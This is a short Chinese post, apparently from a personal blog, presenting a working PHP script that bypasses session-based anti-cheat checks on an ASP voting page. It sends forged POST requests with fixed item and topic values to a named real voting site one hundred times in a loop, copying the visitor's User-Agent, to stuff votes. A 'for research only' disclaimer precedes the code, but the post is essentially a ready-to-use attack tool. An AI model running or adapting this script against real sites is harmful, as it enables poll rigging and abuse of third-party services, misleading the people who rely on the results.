单纯的asp的session防欺骗绕过的办法

今天终于将这个程序搞出来了。

而且有效。 <?php /** * 只供研究学习，后果自行承担 */ require_once("echo.php"); $file = "/test/jstest/xmlhttp/serverSimple.php"; $host = "develop-3"; $host = "toupiao.scol.com.cn"; $file = "/toupiao_save.asp"; $item_button = 66; $topic = 5; $posts = array ( 'item_button' => $item_button,'topic' => $topic); foreach( $posts AS $name => $value ) { $postValues = $postValues . urlencode( $name ) . "=" . urlencode( $value ) . '&'; } $postValues = substr( $postValues, 0, -1 ); $lenght = strlen( $postValues ); $request = "POST $file HTTP/1.1\r\n"; $request .= "Pragma: no cache\r\n"; $request .= "Host: $host\r\n"; $request .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; $request .= "Accept: */*\r\n"; $request .= "Accept-Language: " . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . "\r\n"; //$request .= "Keep-Alive: 1\r\n"; $request .= "Connection: Keep-Alive\r\n"; $request .= "Cache-Control: max-age=0\r\n"; $request .= "Content-Type: application/x-www-form-urlencoded\r\n"; $request .= "Content-Length: $lenght\r\n"; $request .= "\r\n"; $request .= $postValues; $socket = fsockopen($host, 80); for ($k=0,$n=100;$k<$n ;$k++ ) { if($socket==false) { echo "Error: Socket=false"; } else { fputs( $socket, $request ); $ret = ''; $ret = fgets( $socket, 1024 ); //echo "<xmp>$ret</xmp>"; } }//for fclose( $socket ); ?>